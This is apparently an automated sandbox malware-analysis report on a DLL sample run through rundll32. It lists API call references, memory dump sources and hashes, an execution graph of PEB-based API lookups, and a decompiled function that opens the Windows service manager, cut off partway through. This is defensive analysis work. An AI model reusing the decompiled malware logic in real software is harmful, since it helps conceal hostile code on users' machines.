                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3704204646-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • GetFocus.USER32 ref: 10015607
                                                                                                                                  • GetParent.USER32(?), ref: 10015615
                                                                                                                                  • SendMessageA.USER32 ref: 10015628
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4211600527-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2353593579-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                                  • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                                    • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                                  • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 369458955-0
                                                                                                                                  • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                  • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                                  • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                  • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                  • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                  • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                                  • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                  • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                                  • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3384502665-0
                                                                                                                                  • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                  • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                                  • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                  • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                                    • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                                  • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                                  • __lock.LIBCMT ref: 1003A581
                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                                  • InterlockedIncrement.KERNEL32(02701520), ref: 1003A5C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2880340415-0
                                                                                                                                  • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                                  • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                                  • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                                  • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,4CC2CB6B), ref: 1001DCB3
                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,4CC2CB6B), ref: 1001DCC0
                                                                                                                                  • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,4CC2CB6B), ref: 1001DCDB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindFreeLoadLock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1078018258-0
                                                                                                                                  • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                                  • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                                  • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                                  • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                  • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                  • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                  • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                    • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 253586258-0
                                                                                                                                  • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                                  • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                                  • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                                  • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                                  • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                                  • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                                  • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                                    • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                                    • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 685759847-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 1473721057-3887548279
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog3
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 431132790-2766056989
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                                  • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                                    • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                                    • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                    • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                    • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                    • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                    • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                    • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                    • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                    • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                    • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                  Strings
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                                  • String ID: %s.dll
                                                                                                                                  • API String ID: 3444012488-3668843792
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                                  • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                                  • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2949335588-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                  • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3253506028-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                                  • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                                  • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3969253408-0
                                                                                                                                  • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                  • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                                  • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                  • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:15.7%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:1080
                                                                                                                                  Total number of Limit Nodes:17
315c73 GetPEB 5164->5165 5166 308eb3 5165->5166 5166->5156 5168 31c176 5167->5168 5169 31aa30 GetPEB 5168->5169 5170 31c1de 5169->5170 5170->5156 5172 302a71 5171->5172 5173 31aa30 GetPEB 5172->5173 5174 302ad6 5173->5174 5174->5156 5176 31aa30 GetPEB 5175->5176 5177 30923b 5176->5177 5177->5148 5178 3076aa 5177->5178 5179 3076cd 5178->5179 5180 31aa30 GetPEB 5179->5180 5181 307723 5180->5181 5181->5151 5183 31e365 5182->5183 5184 30a42d GetPEB 5183->5184 5185 31e38d 5184->5185 5185->4229 5188 30410d 5186->5188 5189 30421e 5188->5189 5190 31dcf7 2 API calls 5188->5190 5192 30421c 5188->5192 5193 30aad6 GetPEB 5188->5193 5194 30a8b0 GetPEB 5188->5194 5206 301f53 5188->5206 5191 301fd1 GetPEB 5189->5191 5190->5188 5191->5192 5192->4252 5193->5188 5194->5188 5196 316c65 5195->5196 5197 304b61 GetPEB 5196->5197 5198 316d92 5196->5198 5201 316db0 5196->5201 5214 309d31 5196->5214 5197->5196 5210 316637 5198->5210 5201->4252 5203 30b1db 5202->5203 5204 31aa30 GetPEB 5203->5204 5205 30b231 5204->5205 5205->4248 5207 301f6f 5206->5207 5208 31aa30 GetPEB 5207->5208 5209 301fc3 5208->5209 5209->5188 5211 316659 5210->5211 5212 31aa30 GetPEB 5211->5212 5213 3166b7 5212->5213 5213->5201 5215 309d52 5214->5215 5216 31aa30 GetPEB 5215->5216 5217 309dc1 5216->5217 5217->5196 5218 30e991 5219 30ea8d 5218->5219 5220 30ea62 5218->5220 5224 30f8fd 5220->5224 5223 3093ed 2 API calls 5223->5219 5234 30fde0 5224->5234 5225 30ffd1 5227 30ab87 3 API calls 5225->5227 5226 304b61 GetPEB 5226->5234 5228 30ea75 5227->5228 5228->5219 5228->5223 5229 30f899 GetPEB 5229->5234 5230 3146bb 2 API calls 5230->5234 5231 31dcf7 RtlAllocateHeap GetPEB 5231->5234 5232 31da22 GetPEB 5232->5234 5234->5225 5234->5226 5234->5228 5234->5229 5234->5230 5234->5231 5234->5232 5235 30a8b0 GetPEB 5234->5235 5236 3047ce GetPEB 5234->5236 5237 30b23c 5234->5237 5235->5234 5236->5234 5238 30b254 5237->5238 5239 31aa30 GetPEB 5238->5239 5240 30b2b8 lstrcmpiW 5239->5240 5240->5234 5262 304ee3 5263 30b6cf GetPEB 
5262->5263 5264 305133 5263->5264 5265 30b23c 2 API calls 5264->5265 5266 30514c 5265->5266 5267 3051ad 5266->5267 5268 31dcf7 2 API calls 5266->5268 5269 305167 5268->5269 5270 3047ce GetPEB 5269->5270 5271 30518e 5270->5271 5272 30a8b0 GetPEB 5271->5272 5273 30519b 5272->5273 5274 311f8a 2 API calls 5273->5274 5274->5267 5275 301993 5276 3019dd 5275->5276 5277 31aa30 GetPEB 5276->5277 5278 301a3f 5277->5278 5241 3081b7 5251 308679 5241->5251 5242 318519 GetPEB 5242->5251 5244 308f65 2 API calls 5244->5251 5245 31da22 GetPEB 5245->5251 5246 307ff2 2 API calls 5246->5251 5247 3086e2 5248 30b6cf GetPEB 5248->5251 5249 3086c6 5253 311e67 2 API calls 5249->5253 5250 30b23c 2 API calls 5250->5251 5251->5242 5251->5244 5251->5245 5251->5246 5251->5247 5251->5248 5251->5249 5251->5250 5254 31c264 5251->5254 5258 31458f 5251->5258 5253->5247 5255 31c291 5254->5255 5256 31aa30 GetPEB 5255->5256 5257 31c2dd 5256->5257 5257->5251 5259 3145a2 5258->5259 5260 31aa30 GetPEB 5259->5260 5261 314619 5260->5261 5261->5251 5279 310a96 5281 310aa6 5279->5281 5282 314087 GetPEB 5279->5282 5282->5281 5283 304c5d 5284 304d8d 5283->5284 5285 304dd2 5284->5285 5286 318606 2 API calls 5284->5286 5287 304da8 5286->5287 5291 30cbdf 5287->5291 5290 30a8b0 GetPEB 5290->5285 5293 30cbfb 5291->5293 5292 304dbc 5292->5290 5293->5292 5295 314011 5293->5295 5296 314026 5295->5296 5297 31aa30 GetPEB 5296->5297 5298 314078 5297->5298 5298->5293

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 250 30912c-3091af call 3120b9 call 31aa30 OpenSCManagerW
                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                  			E0030912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _t24;
                                                                                                                                  				void* _t32;
                                                                                                                                  				signed int _t34;
                                                                                                                                  				int _t43;
                                                                                                                                  
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(_a20);
                                                                                                                                  				_t43 = __ecx;
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t24);
                                                                                                                                  				_v12 = 0x4657ea;
                                                                                                                                  				_t34 = 0x1b;
